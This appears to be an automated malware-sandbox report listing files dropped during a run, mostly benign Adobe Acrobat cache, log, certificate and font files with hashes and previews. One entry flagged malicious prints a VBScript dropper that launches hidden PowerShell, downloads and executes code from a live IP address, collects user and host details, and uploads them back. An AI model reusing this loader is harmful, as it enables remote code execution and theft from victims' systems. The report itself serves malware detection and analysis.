                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.6585211780652148
                                                                      Encrypted:false
                                                                      SSDEEP:1536:BSB2ESB2SSjlK/AxrO1T1B0CZSJWYkr3g16n2UPkLk+kdbI/0uznv0M1Dn/didMV:Baza6xhzA2U8HDnAPZ4PZf9h/9h
                                                                      MD5:1AB39FB2083EDDE9E8323012F6A85D4F
                                                                      SHA1:D91355EE21454F0C8E9FF7C75A378D34B052F3EF
                                                                      SHA-256:404F96845E9340733F063230084704E910F1D1B8AABC59E0A6C7B127E301BFAD
                                                                      SHA-512:BE73557E50D2E5DECF35E66D80A30573A11D8E60B3F8ACF6A983049BF36D5B5CE25A9593259DF667DF2A8D87942CCEDF7FDB89F82D30174835EB8A5A46825D3F
                                                                      Malicious:false
                                                                      Preview:.._h... ...............X\...;...{......................T.~......,...|...)...|..h.|......,...|..T.~.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................D.9.,...|...................e&..,...|...........................#......T.~.....................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):0.07950844231781955
                                                                      Encrypted:false
                                                                      SSDEEP:3:J3mltUetYeCV4e4Zllto1HJo71kYZlltKJ5Z4Zlltoll58Kgvvl/QoeP/ll:lmltNzFM1GRVOvGcz8KgR+t
                                                                      MD5:4A25EE32176C72B8A73A3586B49B4441
                                                                      SHA1:D93176CFC71F3AC8CC57C701AAE347DA1618373B
                                                                      SHA-256:0B30ECD0817DBACE604F38F5958461F3798B472D853783057F4E430B5EEB9895
                                                                      SHA-512:9D3D61D5DAB795BC2F514924A72672690F33199D1009C29EA4FA81F04A0D18FDC3F5D1DC784DC2AB8D74E24BB4F390F61E27DC6F59E017E84CFC34B824725F1F
                                                                      Malicious:false
                                                                      Preview:m.q......................................;...{...)...|5..,...|...........,...|...,...|...|...,...|...................e&..,...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with very long lines (708), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):780
                                                                      Entropy (8bit):5.47444462852123
                                                                      Encrypted:false
                                                                      SSDEEP:24:B5KXxuqHDoXs9u+oeoQVrL2/8xap7Uu73poXsgW0n:ohHkXshojQVeEUp7J7CXsw
                                                                      MD5:79C5A75750D2C901E3212EADD6A66BC0
                                                                      SHA1:DBA1B8554D40DA5C9A41CF9025BE70C6BE9EF0B1
                                                                      SHA-256:9284000139B2FA271F420224CBF794571F94CF0A1DD30A069FB26CC3CC68F3F8
                                                                      SHA-512:076AAD0A9ECBB4C00F24E8222B96B70B380443D0C6E133EC1C8E553F1AC598003DF5F994B1B8710603BC734C5B8D11CB706DC969B0A619F86EE003728618FF1D
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: C:\Users\Public\Libraries\Recorded.vbs, Author: Joe Security
                                                                      Preview:dim r, c..set r = createobject("WScript.Shell")..c = "powershell.exe -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}"..r.Run c, 0, false....
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):294
                                                                      Entropy (8bit):5.2539116487069455
                                                                      Encrypted:false
                                                                      SSDEEP:6:PIuy9RJk9+q2P92nKuAl9OmbnIFUt82Iuy9RHUB9NJZmw+2Iuy9RHUB9N9VkwO9f:PcJk4v4HAahFUt82c0B9NJ/+2c0B9NDE
                                                                      MD5:C82E6457BC0DCE54C6670E733D5037A7
                                                                      SHA1:02664CB637AA4E81ED408D54E1FBEEDE52D767B6
                                                                      SHA-256:3B1EA92C98BB5712CE37F2CF6BD3495D84F1175AA045ABB89A438AA9E8A54977
                                                                      SHA-512:AC27E6179DBA8319275101F14779D3C8C370A4B44E8E3EBF491B1DCD64ED8FB6B481DBB19B5B6B26470C2BEA22DBDD4CC40187304D581641D93D2EB95EBFC7AB
                                                                      Malicious:false
                                                                      Preview:2024/09/30-09:41:15.866 1db8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/09/30-09:41:15.868 1db8 Recovering log #3.2024/09/30-09:41:15.868 1db8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):338
                                                                      Entropy (8bit):5.171894523119665
                                                                      Encrypted:false
                                                                      SSDEEP:6:PIuy9dq2P92nKuAl9Ombzo2jMGIFUt82Iuy9mZZmw+2Iuy9nkwO92nKuAl9Ombzz:PAv4HAa8uFUt82f/+2M5LHAa8RJ
                                                                      MD5:80A9EB8B5721A37C7BF8A34FB0B10FD3
                                                                      SHA1:05CED9B9A513B779C54D3B72F78BAE18E4FE71AD
                                                                      SHA-256:0F2225D1D5216F54D6A8D626BB37D9276CA51E47EE9D030B5E3ED070714FB67C
                                                                      SHA-512:1485D6CA68BB197E1C35533C18BC109D65C5FC07B37083E3248E89F40B8733FD0CC240A77F0B5F7E26AFC245C377BA5FC2D1920517C17EF9834C83CE090DB828
                                                                      Malicious:false
                                                                      Preview:2024/09/30-09:41:15.896 1e20 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/09/30-09:41:15.898 1e20 Recovering log #3.2024/09/30-09:41:15.899 1e20 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:JSON data
                                                                      Category:modified
                                                                      Size (bytes):508
                                                                      Entropy (8bit):5.051360204753677
                                                                      Encrypted:false
                                                                      SSDEEP:12:YH/um3RA8sqD1EsBdOg2HHAcaq3QYiubxnP7E4T3OF+:Y2sRdsg3dMHL3QYhbxP7nbI+
                                                                      MD5:3833200A0C82391B2C72987EB45FF9F0
                                                                      SHA1:499564DDA2022AEA9EC297D6FAE404AC9C38DA85
                                                                      SHA-256:2531DBD5197AF4B31C2EEAC48BC57F292D233DF5DE9308DEA2D6A9F14E21E1C8
                                                                      SHA-512:07F1C42843F76CBE07D7952288040D5448C05735CC4B5880327A4F0E6B885DFF2D6F5A2B0622DF7C8CF736BF1497F2743658ECAAA95329B17066002BE63A1995
                                                                      Malicious:false
                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13372263685954699","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":129529},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):508
                                                                      Entropy (8bit):5.051360204753677
                                                                      Encrypted:false
                                                                      SSDEEP:12:YH/um3RA8sqD1EsBdOg2HHAcaq3QYiubxnP7E4T3OF+:Y2sRdsg3dMHL3QYhbxP7nbI+
                                                                      MD5:3833200A0C82391B2C72987EB45FF9F0
                                                                      SHA1:499564DDA2022AEA9EC297D6FAE404AC9C38DA85
                                                                      SHA-256:2531DBD5197AF4B31C2EEAC48BC57F292D233DF5DE9308DEA2D6A9F14E21E1C8
                                                                      SHA-512:07F1C42843F76CBE07D7952288040D5448C05735CC4B5880327A4F0E6B885DFF2D6F5A2B0622DF7C8CF736BF1497F2743658ECAAA95329B17066002BE63A1995
                                                                      Malicious:false
                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13372263685954699","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":129529},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):4099
                                                                      Entropy (8bit):5.228732222138244
                                                                      Encrypted:false
                                                                      SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLU0qXi4Lx:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLm
                                                                      MD5:A9D415932ECEFE5AFAA54B948D69C030
                                                                      SHA1:911B639E44A1C103FAC1EBF0B16648C3609BFB58
                                                                      SHA-256:BC03BABEEF2591FC260C1BEE782559E7B256BE15B55718EDA965722FCD264250
                                                                      SHA-512:534C728220152635EA76169B811DED15D80C77C39581FC5A828F32D9713CB26E030C17152E89B342E5003C56C68B4E180E3D16DEB82E3816C2E016AD4E3EAA8D
                                                                      Malicious:false
                                                                      Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):326
                                                                      Entropy (8bit):5.161399960627827
                                                                      Encrypted:false
                                                                      SSDEEP:6:PIuyuXIq2P92nKuAl9OmbzNMxIFUt82Iuy3Zmw+2IuyoDkwO92nKuAl9OmbzNMFd:P/Iv4HAa8jFUt82k/+2JD5LHAa84J
                                                                      MD5:053FECF9EB9B9D8FB34B6193248FF6CB
                                                                      SHA1:3DB0E1704FCBD923C3F2B699DDEDB912D0DEDC74
                                                                      SHA-256:F1A02A54BAAD9993DF5B93BB7EE15998C0D10DA430D4BD6DF62EDE548C6C66B2
                                                                      SHA-512:522D643AE9B8F86BB24C36477A4FDFAECD74864D306888A9610841AC99343606972B1244BA507F8D8F3ADD15D65F4D26DA238B187EB902DC6C5A9DF0E324D49D
                                                                      Malicious:false
                                                                      Preview:2024/09/30-09:41:16.073 1e20 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/09/30-09:41:16.074 1e20 Recovering log #3.2024/09/30-09:41:16.075 1e20 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                      Category:dropped
                                                                      Size (bytes):65110
                                                                      Entropy (8bit):1.0025236639109925
                                                                      Encrypted:false
                                                                      SSDEEP:6:upCl/OuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuN:ptF
                                                                      MD5:913275AD9D8A17D6FE2695BB51BC7863
                                                                      SHA1:9C29246D92F80A7BDDEC1B53C8705EDBDC0A4759
                                                                      SHA-256:5E6EBDE5554818D0BD1203842D3FEE08CF894B3426C291244506CF749A3569CB
                                                                      SHA-512:48A23707771345E1F2F29A383D6EE1F6F3BF9E079603701ABA4B076724BFEDE2F79950B310F5597DA237451DA53D6877DA0EFF888DD84416DA09536037A8DDC6
                                                                      Malicious:false
                                                                      Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 3, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):57344
                                                                      Entropy (8bit):3.293550397139526
                                                                      Encrypted:false
                                                                      SSDEEP:192:/edRBFVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:/eDci5H5FY+EUUUTTcHqFzqFP
                                                                      MD5:E55F55F4B1B18FC52B77F52E998D909A
                                                                      SHA1:3E70FDC13A5EF4CC836901855EC7800D0981F69D
                                                                      SHA-256:8D39AD6168C2C9B57C8F9797EA8051A5B98B62FC9B805BAA077967826AAFB225
                                                                      SHA-512:A3A4D2ABC4864019E4BEE5E81266A734DC8FF03BD2F784BDF9D416321DE3C2AFEB4C0AB694F9BD00F859D187EA5B03AF592C2C0E10DE4A843CD54F856D4F4003
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite Rollback Journal
                                                                      Category:dropped
                                                                      Size (bytes):8720
                                                                      Entropy (8bit):2.2040677335642003
                                                                      Encrypted:false
                                                                      SSDEEP:24:7+tJMEWewK3qLazkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9I:7MiU3qemFTIF3XmHjBoGGR+jMz+Lhm
                                                                      MD5:D9BD49178C6CADA353402D9D88C05DED
                                                                      SHA1:AB77FA5C0C17EDBEF07BBD8E44FED60A6CA3F5ED
                                                                      SHA-256:1F805A69E696FBD08EDDD9AEFF78DE7497479E324FCB2DA1ED949CDB2675CF89
                                                                      SHA-512:C52D527E5D57860F86F6FABEC465AEC57331BFBADBDD9B76EC368046205F73D6E98F9C47EE8888AE3EA3D5DF42982673ECA5DC0F6679F4320FBA049CDC4F0F72
                                                                      Malicious:false
                                                                      Preview:.... .c.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:Certificate, Version=3
                                                                      Category:dropped
                                                                      Size (bytes):1391
                                                                      Entropy (8bit):7.705940075877404
                                                                      Encrypted:false
                                                                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                      Malicious:false
                                                                      Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                      Category:dropped
                                                                      Size (bytes):71954
                                                                      Entropy (8bit):7.996617769952133
                                                                      Encrypted:true
                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                      Malicious:false
                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):192
                                                                      Entropy (8bit):2.7282048283587708
                                                                      Encrypted:false
                                                                      SSDEEP:3:kkFklAW2hfllXlE/HT8kshttNNX8RolJuRdxLlGB9lQRYwpDdt:kKZWnT8rVNMa8RdWBwRd
                                                                      MD5:179C62DC8C48488C7543ACDB5690C564
                                                                      SHA1:CED9910F667AB80D460272BEDF55008ED86ABB45
                                                                      SHA-256:1C72A895C74852DD98AE1BF6766507C624273AD6112DE28860DE5483BDD1D8F3
                                                                      SHA-512:FB2DD62108EFF8527E2F6EE3037963595F12A96DC13F851C06091EAD6B5D3CDB8BDD32EEEEEFD80555441CD72F89D0EAB382FD1199BB05204DE39CD38068FFD1
                                                                      Malicious:false
                                                                      Preview:p...... ........33,r>...(....................................................... ..........W....yp..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):328
                                                                      Entropy (8bit):3.2346401979075696
                                                                      Encrypted:false
                                                                      SSDEEP:6:kK/Pi9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:XlDImsLNkPlE99SNxAhUe/3
                                                                      MD5:5719806268D8B876E3B57EABA98B30D3
                                                                      SHA1:840F16EA128B7F1D30455572C6DDF9B0E10CA3B6
                                                                      SHA-256:AF0947280DDE33E20FED3432452C913C7D7D5BE9BF3B5635411977FC7A5A3A27
                                                                      SHA-512:9F871F6A1C4CA6C6B9BB20871F85CC1657B0630ED145F1F105CEE031F494050937EEB4F83C3A7D8E74D95A44C81D262CB4E59C858528A939D3F4D07EDC72620E
                                                                      Malicious:false
                                                                      Preview:p...... ..........`.>...(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):185099
                                                                      Entropy (8bit):5.182478651346149
                                                                      Encrypted:false
                                                                      SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                      MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                      SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                      SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                      SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):185099
                                                                      Entropy (8bit):5.182478651346149
                                                                      Encrypted:false
                                                                      SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                      MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                      SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                      SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                      SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):4
                                                                      Entropy (8bit):0.8112781244591328
                                                                      Encrypted:false
                                                                      SSDEEP:3:e:e
                                                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                      Malicious:false
                                                                      Preview:....
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):2145
                                                                      Entropy (8bit):5.0701952346578505
                                                                      Encrypted:false
                                                                      SSDEEP:24:YFud/Y3QJGm27XHZ2LSCt7aZna0TNpnayGZmmuBJvbZW4xCZqu20Z+nZO8ZMCCD/:Y5AwmWXZYEtoitbRCwu20wD+JliWxao
                                                                      MD5:19332271EF267D6062660175B419E3D0
                                                                      SHA1:030EAAD7879E86F963E72E2BE19D23C32700BB0B
                                                                      SHA-256:FF6896335F2555FDC51D6417D9923F67F531DFCBB86AB0F5E36B316BB96476FB
                                                                      SHA-512:C9D4DAFEDA9B8518BA728DE1C2E5EF2C77F8CFDE2E838D76028F1EDE0117526F50CBF9778BF8DD75D0BE1AA4061DA91D8F0FF9D507B12AA6418EE35F400081DC
                                                                      Malicious:false
